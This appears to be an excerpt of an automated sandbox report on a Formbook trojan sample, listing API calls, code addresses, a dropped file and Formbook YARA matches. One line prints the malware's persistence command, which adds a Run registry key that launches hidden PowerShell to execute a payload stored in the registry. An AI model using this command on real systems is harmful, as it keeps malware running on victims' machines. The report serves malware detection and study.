        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2E80 NtReadVirtualMemory,8_2_204A2E80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2EA0 NtAdjustPrivilegesToken,8_2_204A2EA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2F60 NtCreateProcessEx,8_2_204A2F60
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2F30 NtCreateSection,8_2_204A2F30
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2FE0 NtCreateFile,8_2_204A2FE0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2F90 NtProtectVirtualMemory,8_2_204A2F90
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2FA0 NtQuerySection,8_2_204A2FA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A2FB0 NtResumeThread,8_2_204A2FB0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A3010 NtOpenDirectoryObject,8_2_204A3010
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A3090 NtSetValueKey,8_2_204A3090
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A4340 NtSetContextThread,LdrInitializeThunk,14_2_031A4340
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A4650 NtSuspendThread,LdrInitializeThunk,14_2_031A4650
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2B60 NtClose,LdrInitializeThunk,14_2_031A2B60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2AD0 NtReadFile,LdrInitializeThunk,14_2_031A2AD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2AF0 NtWriteFile,LdrInitializeThunk,14_2_031A2AF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2F30 NtCreateSection,LdrInitializeThunk,14_2_031A2F30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2FB0 NtResumeThread,LdrInitializeThunk,14_2_031A2FB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2FE0 NtCreateFile,LdrInitializeThunk,14_2_031A2FE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2EE0 NtQueueApcThread,LdrInitializeThunk,14_2_031A2EE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2D10 NtMapViewOfSection,LdrInitializeThunk,14_2_031A2D10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2D30 NtUnmapViewOfSection,LdrInitializeThunk,14_2_031A2D30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2DD0 NtDelayExecution,LdrInitializeThunk,14_2_031A2DD0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_031A2DF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_031A2C70
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2C60 NtCreateKey,LdrInitializeThunk,14_2_031A2C60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_031A2CA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A35C0 NtCreateMutant,LdrInitializeThunk,14_2_031A35C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A39B0 NtGetContextThread,LdrInitializeThunk,14_2_031A39B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2B80 NtQueryInformationFile,14_2_031A2B80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2BA0 NtEnumerateValueKey,14_2_031A2BA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2BF0 NtAllocateVirtualMemory,14_2_031A2BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2BE0 NtQueryValueKey,14_2_031A2BE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2AB0 NtWaitForSingleObject,14_2_031A2AB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2F60 NtCreateProcessEx,14_2_031A2F60
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2F90 NtProtectVirtualMemory,14_2_031A2F90
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2FA0 NtQuerySection,14_2_031A2FA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2E30 NtWriteVirtualMemory,14_2_031A2E30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2E80 NtReadVirtualMemory,14_2_031A2E80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2EA0 NtAdjustPrivilegesToken,14_2_031A2EA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2D00 NtSetInformationFile,14_2_031A2D00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2DB0 NtEnumerateKey,14_2_031A2DB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2C00 NtQueryInformationProcess,14_2_031A2C00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2CC0 NtQueryVirtualMemory,14_2_031A2CC0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A2CF0 NtOpenProcess,14_2_031A2CF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A3010 NtOpenDirectoryObject,14_2_031A3010
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A3090 NtSetValueKey,14_2_031A3090
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A3D10 NtOpenProcessToken,14_2_031A3D10
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A3D70 NtOpenThread,14_2_031A3D70
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E7730 NtCreateFile,14_2_003E7730
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E7890 NtReadFile,14_2_003E7890
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E7970 NtDeleteFile,14_2_003E7970
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E7A10 NtClose,14_2_003E7A10
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_004033B3 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033B3
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeFile created: C:\Windows\SysWOW64\psiloses.lnkJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_0040727F0_2_0040727F
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeCode function: 0_2_00406AA80_2_00406AA8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033DF1082_2_033DF108
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033DF9D82_2_033DF9D8
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_033DEDC02_2_033DEDC0
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_079689702_2_07968970
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205020008_2_20502000
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F81588_2_204F8158
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204601008_2_20460100
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050A1188_2_2050A118
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205281CC8_2_205281CC
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205241A28_2_205241A2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205301AA8_2_205301AA
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205102748_2_20510274
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204F02C08_2_204F02C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052A3528_2_2052A352
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205303E68_2_205303E6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047E3F08_2_2047E3F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205224468_2_20522446
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205144208_2_20514420
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051E4F68_2_2051E4F6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204705358_2_20470535
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205305918_2_20530591
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2048C6E08_2_2048C6E0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204947508_2_20494750
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204707708_2_20470770
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046C7C08_2_2046C7C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047A8408_2_2047A840
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204728408_2_20472840
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2049E8F08_2_2049E8F0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204568B88_2_204568B8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204869628_2_20486962
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204729A08_2_204729A0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2053A9A68_2_2053A9A6
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046EA808_2_2046EA80
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052AB408_2_2052AB40
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20526BD78_2_20526BD7
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470C008_2_20470C00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20460CF28_2_20460CF2
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20510CB58_2_20510CB5
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047AD008_2_2047AD00
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2050CD1F8_2_2050CD1F
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2046ADE08_2_2046ADE0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20488DBF8_2_20488DBF
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20470E598_2_20470E59
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052EE268_2_2052EE26
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052EEDB8_2_2052EEDB
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052CE938_2_2052CE93
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20482E908_2_20482E90
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204E4F408_2_204E4F40
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20512F308_2_20512F30
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204B2F288_2_204B2F28
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20490F308_2_20490F30
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_20462FC88_2_20462FC8
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2047CFE08_2_2047CFE0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204EEFA08_2_204EEFA0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204770C08_2_204770C0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2051F0CC8_2_2051F0CC
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2052F0E08_2_2052F0E0
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_205270E98_2_205270E9
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_204A516C8_2_204A516C
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2045F1728_2_2045F172
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: 8_2_2053B16B8_2_2053B16B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322A35214_2_0322A352
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_032303E614_2_032303E6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317E3F014_2_0317E3F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0321027414_2_03210274
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031F02C014_2_031F02C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316010014_2_03160100
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0320A11814_2_0320A118
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031F815814_2_031F8158
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_032241A214_2_032241A2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_032301AA14_2_032301AA
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_032281CC14_2_032281CC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0320200014_2_03202000
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0319475014_2_03194750
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317077014_2_03170770
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316C7C014_2_0316C7C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318C6E014_2_0318C6E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317053514_2_03170535
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0323059114_2_03230591
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0321442014_2_03214420
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322244614_2_03222446
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0321E4F614_2_0321E4F6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322AB4014_2_0322AB40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03226BD714_2_03226BD7
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316EA8014_2_0316EA80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318696214_2_03186962
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0323A9A614_2_0323A9A6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031729A014_2_031729A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317A84014_2_0317A840
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317284014_2_03172840
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031568B814_2_031568B8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0319E8F014_2_0319E8F0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03212F3014_2_03212F30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03190F3014_2_03190F30
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031B2F2814_2_031B2F28
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031E4F4014_2_031E4F40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031EEFA014_2_031EEFA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03162FC814_2_03162FC8
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317CFE014_2_0317CFE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322EE2614_2_0322EE26
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03170E5914_2_03170E59
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03182E9014_2_03182E90
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322CE9314_2_0322CE93
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322EEDB14_2_0322EEDB
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317AD0014_2_0317AD00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0320CD1F14_2_0320CD1F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03188DBF14_2_03188DBF
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316ADE014_2_0316ADE0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03170C0014_2_03170C00
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03210CB514_2_03210CB5
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03160CF214_2_03160CF2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322132D14_2_0322132D
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0315D34C14_2_0315D34C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031B739A14_2_031B739A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031752A014_2_031752A0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_032112ED14_2_032112ED
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318B2C014_2_0318B2C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0323B16B14_2_0323B16B
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0315F17214_2_0315F172
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031A516C14_2_031A516C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317B1B014_2_0317B1B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322F0E014_2_0322F0E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_032270E914_2_032270E9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031770C014_2_031770C0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0321F0CC14_2_0321F0CC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322F7B014_2_0322F7B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031617EC14_2_031617EC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_032216CC14_2_032216CC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322757114_2_03227571
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0320D5B014_2_0320D5B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322F43F14_2_0322F43F
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0316146014_2_03161460
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322FB7614_2_0322FB76
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318FB8014_2_0318FB80
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031ADBF914_2_031ADBF9
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031E5BF014_2_031E5BF0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03227A4614_2_03227A46
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322FA4914_2_0322FA49
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031E3A6C14_2_031E3A6C
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03211AA314_2_03211AA3
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0320DAAC14_2_0320DAAC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031B5AA014_2_031B5AA0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0321DAC614_2_0321DAC6
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0320591014_2_03205910
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0317995014_2_03179950
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318B95014_2_0318B950
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031DD80014_2_031DD800
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031738E014_2_031738E0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322FF0914_2_0322FF09
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03171F9214_2_03171F92
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322FFB114_2_0322FFB1
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03179EB014_2_03179EB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03227D7314_2_03227D73
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03173D4014_2_03173D40
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_03221D5A14_2_03221D5A
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0318FDC014_2_0318FDC0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_031E9C3214_2_031E9C32
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_0322FCF214_2_0322FCF2
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003D137014_2_003D1370
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003CC51014_2_003CC510
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003CC73014_2_003CC730
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003CA7B014_2_003CA7B0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003D2EB014_2_003D2EB0
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003D2EAC14_2_003D2EAC
        Source: C:\Windows\SysWOW64\cmd.exeCode function: 14_2_003E9E8014_2_003E9E80
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll 10675F13ABAEE592F14382349AA35D82FB52AAB4E27EEF61D0C83DEC1F6B73DA
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 031EF290 appears 105 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 0315B970 appears 283 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 031A5130 appears 58 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 031DEA12 appears 86 times
        Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 031B7E54 appears 100 times
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: String function: 204B7E54 appears 54 times
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: String function: 204A5130 appears 32 times
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: String function: 204DEA12 appears 49 times
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: String function: 204EF290 appears 80 times
        Source: C:\Users\user\AppData\Local\Temp\Overfondle.exeCode function: String function: 2045B970 appears 111 times
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe, 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameblegrde.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeBinary or memory string: OriginalFilenameblegrde.exeDVarFileInfo$ vs SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
        Source: SecuriteInfo.com.Win32.Malware-gen.9746.16728.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
        Source: 0000000E.00000002.2615858541.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000F.00000002.2616564781.0000000002D60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000E.00000002.2616210214.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.2164570528.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000E.00000002.2614202921.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000008.00000002.2184865476.0000000021B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
